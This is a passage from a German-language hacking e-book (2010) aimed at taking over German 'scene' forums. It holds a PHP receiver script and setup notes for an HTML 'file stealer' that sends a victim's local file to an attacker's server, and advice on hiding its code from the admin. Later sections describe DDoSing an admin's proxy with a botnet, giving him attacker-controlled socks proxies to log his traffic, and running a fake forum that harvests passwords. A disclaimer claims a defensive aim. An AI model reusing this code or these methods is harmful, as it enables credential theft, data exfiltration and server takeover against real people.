fwrite($fp, "\r\n\r\n#########next file##########\r\n\r\n" . $_GET["log"]);
fclose($fp); } else { $filename="[logfile]";
$fp = fopen($filename,'w');
fwrite($fp, "$_GET["log"]);
fclose($fp); } }
header('Location: [weiterleitung]');
?>

#########help.txt#########

###html file stealer - by unnex###

hilfe:

zu bearbeiten:

#sender.html
[server]=eigenen server angeben zb: www.meinserver.de
[local-file]=locale zu klauende datei angeben zb: C:/geheim.txt

line 9: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
line 14: location.href="http://[server]/save.php?log="+escape(document.x.textausgabe.value);
line 53: <p><input type="text" name="textfile" value="file:///[local-file]" size="20">

#annahme.php

[logfile]=logfile angeben wo die daten der geklauten datei gespeichert werden zb: log.txt
[weiterleitung]=wohin das opfer schlussendlich gelinkt werden soll zb http://google.de

line 3: if (file_exists("[logfile]")) {
line 4: $filename="[logfile]";
line 7: fclose($fp); } else { $filename="[logfile]";
line 11: header('Location: [weiterleitung]');

wird das script im localmode ausgefuehrt, dann wird die datei vom vic uebertragen.
wichtig: sende die datei an dein vic. nicht uppe die datei und sende den link!
---
wir muessen uns dabei keine sorgen machen das dem admin das auffaellt. denn wie wir wissen ist das
eine methode die sehr selten und spezifisch ist. und deswegen ist es gerade zu laecherlich einem board
admin aus der deutschen scene ausreichende kenntnisse zu zu schreiben, das er diesen angriff erkennen
koennte. wie schon in "1.2 teamanalyse" erwaehnt. hinzu kommend gelten .html dateien sowieso als
unbedenklich.
allerdings sollten wir den code sehr gut verstecken. bzw wir sollten viel stylischen
schnickschnack mit in die html datei bringen damit unser code nicht auffaellt. oder jedes zeichen als
unicode ausgabe nehmen. ebenso kann es nicht schaden wenn wir die html datei grundsaetzlich mit viel
code oder unicode zeichen (oder jedes zeichen als unicode zeichen) zupflastern. wir wollen ja nicht
gefahr laufen das der admin unser tut im texteditor liest.
unser fertiges tutorial+file-stealer stellen wir dann im board online.
folgend schreiben wir den admin an und empfehlen ihm unser tutorial. sollte er kein interesse zeigen,
dann koennen wir auch notfalls die begruendung einbringen das er es sich mal ansehen soll um
verbesserungen oder fehler sagen zu koennen. nun brauchen wir nur noch zu warten bis er sich
unser tutorial zieht und es mit seinem browser oeffnet. der inhalt der root.txt wird an unseren
server geschickt und schon haben wir alle infos die wir zur uebernahme des servers brauchen.
vorteilhaft an dieser methode ist auch das unsere html datei logischerweise mit jedem
browser geoeffnet werden kann. demnach ist unser script nur auf den browser angewiesen, das
betriebssystem spielt also keine rolle bei diesem angriff.

3.2.3 mein nolog, loggt
der name dieses unterpunkts sagt eigentlich schon alles. ich denke mal es ist schnell erklaert^^
bei dieser methode sind wiedermal unsere ressourcen gefragt.
zu aller erst besorgen wir uns die ip des vpn oder socks vom admin. wie wir das machen wissen
wir ja aus "2.1 ip's besorgen". dann melden wir uns im forum an und erstellen einen thread in dem
wir kostenlos nolog-socks anbieten. nun warten wir ein bisschen bis sich unser angebot rummgesprochen
hat. dann ddosn wir den sock vom admin down. viele nutzen gehackte server auf denen sie socks
installiert haben. mit einem mittelmaesigen botnet duerften wir also in den meisten faellen
erfolg haben. nun gibt es zwei moeglichkeiten. entweder der admin nimmt von selbst einen eurer
angebotenen socks oder wir muessen ihm einen aufschwatzen. sollte er von selbst einen von euch nehmen
dann haben wir schon gewonnen. ansonsten: schreiben wir den admin an und erzaehlen ihm von ein paar
servern die wir hacked haben und ihm geben wollen. oder wie fragen ihn ob er eine seite fuer uns hackt.
also, wir reden ihm ein paar dinge ein damit er von ganz allein nach einem sock fragt. sollte er nicht
fragen dann schicken wir ihm einfach einen. egal ob er danach gefragt hat oder nicht. einfach mal den
sock+logindaten dem admin geben. glaubts mir leute, in der not frisst der teufel fliegen ;-)
was der admin mit sicherheit nicht wissen wird ist, das wir im gegensatz zu ihm wissen das die socks5
verschluesselung alles andere als perfekt ist. da uns der sock gehoert und wir den server unter der
fuchtel haben, koennen wir nun frei alle handlungen des admins loggen. im grunde muessen nun nur noch
warten bis der admin sich ueber unseren sock im acp des boards einloggt.

3.3 meine projekte
an dieser stelle sollte erstmal jedem klar sein das ich hier nicht von meinen persoehnlichen projekten
spreche sondern von den einzelnen methoden wie man eigene projekte zum hacken eines deutschen
sceneboards nutzen kann. also nicht vom unterpunkt-titel irritieren lassen.
grundregel fuer diese arten von angriffen ist: "der admin benutzt sogut wie ueberall das selbe passwort".

3.3.1 meine crew
im grunde ist die sache ganz einfach. zu erst einmal brauchen wir ein forensystem. am besten ein sehr
bekanntes was auch viele andere scene-boards nutzen. das setzen wir dann auf nen server und ernennen
es zum scene-board. nun basteln wir die loginfunction ein bisschen um so das alle user+pw geloggt werden.
dann machen wir ein bisschen werbung dafuer. wenn wir ein paar user zusammen haben,
sagen wir mal 20, dann fangen wir an ein paar ahnungslose nicht-scene seiten zu defacen. diese
versehen wir mit werbung fuer unser board. anschließend posten wir unsere defaces auf unserem board
und auf dem board welches wir angreifen wollen. wir verfahren eine weile so weiter bis unser board
ein bisschen bekanntheistgrad im kreise des anderen boards erreicht hat. nun ist es an der zeit
dem admin des victim-boards eine linkpartnerschaft vor zu schlagen. er wird sich bei uns registrieren
muessen um die lage einschaetzen zu koennen. und hier ist auch schon ende vom lied. wenn er sich regt
wird das passwort geloggt und wir koennen es auf sein board anwenden. notfalls koennen wir dem
admin auch vorschlagen einen besonderen titel in unserem board zu bekommen zb. "linkpartner" usw...

nachwort:
alle hier beschriebenen methoden wurden von mir selbst schon erfolgreich
durchgefuehrt. natuerlich sind diese taktiken nicht 1zu1 durchfuehrbar.
bzw man muss sie logischerweise angepasst an die gegebenheiten handhaben.

jeder der mit social engeneering arbeitet ist darauf bedacht auch nach dem
angriff unentdeckt zu bleiben. allerdings kann man auch mal pech haben :D
aber gerade deswegen kann ich hier auch mal eine referenz fuer die beschriebenen
angriffstalktiken einbringen:

"3.1.1 bug fixen" > http://scenewiki.wordpress.com/2010/04/18/cyberterrorists-defaced/

vllt. noch ein wort dazu: dieser hack war eher ein fehler. bzw. ich haette die seite nicht
defacen duerfen dann waer ich auch nicht aufgefellen XD ebenso ist dieser admin "bursali"
ein typ der ganz ok ist. es war also eher unberechtigt von mir ihm so in die suppe zu pissen XD

---------
dieses e-book darf nur in unabgeaenderter form frei kopiert werden.
(der gesamte text, auch dieser satz hier, vorwort & nachwort)
dieses e-book dient lediglich zur aufdeckung sowie dem verstaendniss
und der behebung von sicherheitsschwachstellen in deutschen scene-boards.
ich distanziere mic von jeglichem schaden der durch dieses e-book
entstehen kann und weise alle leser darauf hin das die hier gebotenen
informationen nicht fuer kriminelle zwecke missbrauch werden duerfen.

---
greetz unnex

------------------------
<november 2010